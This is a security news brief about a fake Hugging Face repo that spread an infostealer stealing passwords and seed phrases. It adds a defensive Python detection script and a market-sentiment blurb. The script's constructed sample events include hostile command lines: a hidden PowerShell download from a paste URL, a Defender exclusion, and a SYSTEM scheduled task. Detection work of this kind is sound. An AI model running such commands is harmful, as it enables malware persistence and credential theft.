Malicious Hugging Face repo impersonating OpenAI trended #1 and delivered an infostealer that exfiltrated browser passwords and crypto seed phrases
first published 2026-05-12T20:46:59Z
A fake Hugging Face repo published under “Open-OSS” reached #1 trending and logged ~244,000 downloads and 667 likes in under 18 hours before removal. Installing the repo ran a six-stage loader that fetched commands from a public JSON paste, invoked PowerShell, downloaded a Rust infostealer, added Windows Defender exclusions, scheduled a task running as SYSTEM, and then self-cleaned. The payload exfiltrated Chrome/Firefox passwords, session cookies, encryption keys, Discord tokens, crypto wallet seed phrases, SSH/FTP credentials and screenshots, and it avoided running inside VMs and sandboxes. AI security firm HiddenLayer flagged the campaign and found related repos and bot-like engagement; Hugging Face removed the repo but has not announced additional screening measures for trending repos.
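The loader stages named above (a hidden PowerShell fetch from a public paste, Defender exclusion tampering, and a scheduled task running as SYSTEM) are behaviours that endpoint process-creation telemetry can catch. The following is an added example, not code from the article or from HiddenLayer: it runs three command-line detection rules over constructed Sysmon-style events, and the paths, task name and paste URL in the samples are invented.

```python
"""Detection rules for the loader behaviours described above, applied to
constructed process-creation events (Sysmon Event ID 1 field names)."""
import re

# Constructed sample events; not real logs from the campaign.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Users\dev\venv\Scripts\python.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c \"iwr https://paste.example/raw/abc\""},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c \"Add-MpPreference -ExclusionPath 'C:\\Users\\dev\\AppData\\Roaming'\""},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": "schtasks /create /tn Updater /tr C:\\Users\\dev\\AppData\\Roaming\\svc.exe /sc onlogon /ru SYSTEM /f"},
    {"ParentImage": r"C:\Windows\explorer.exe",  # benign: a user listing a task
     "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": "schtasks /query /tn Updater"},
]

# Each rule is (name, regex over CommandLine). Case-insensitive because
# PowerShell cmdlets and schtasks switches accept any casing.
RULES = [
    ("hidden_powershell_remote_fetch",
     re.compile(r"powershell.*-w(indowstyle)?\s+hidden.*\b(iwr|Invoke-WebRequest|"
                r"irm|Invoke-RestMethod|DownloadString)\b.*https?://", re.I)),
    ("defender_exclusion_added",
     re.compile(r"\b(Add|Set)-MpPreference\b.*-Exclusion(Path|Process|Extension)", re.I)),
    ("scheduled_task_runs_as_system",
     re.compile(r"\bschtasks(\.exe)?\b.*/create\b.*/ru\s+\"?(NT AUTHORITY\\)?SYSTEM\b", re.I)),
]


def detect(events):
    """Return (rule_name, event_index) pairs for every event a rule matches."""
    hits = []
    for i, ev in enumerate(events):
        cmd = ev.get("CommandLine", "")
        for name, pattern in RULES:
            if pattern.search(cmd):
                hits.append((name, i))
    return hits


if __name__ == "__main__":
    for name, i in detect(SAMPLE_EVENTS):
        print(f"{name}: {SAMPLE_EVENTS[i]['CommandLine']}")
```

The benign `schtasks /query` event is deliberately included to show the task rule only fires on `/create` with a SYSTEM principal, not on every schtasks invocation.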
AI Analysis
The repo reached #1 trending with ~244,000 downloads and delivered a multi-stage infostealer that exfiltrated browser passwords, session cookies, encryption keys, Discord tokens and crypto wallet seed phrases. HiddenLayer identified related malicious repos and bot-driven engagement. The repository was removed, but no new screening measures were disclosed. This is a factual security risk to users and their stored credentials.
Expected Investor Sentiment: Bearish
Potential Market Impact: Significant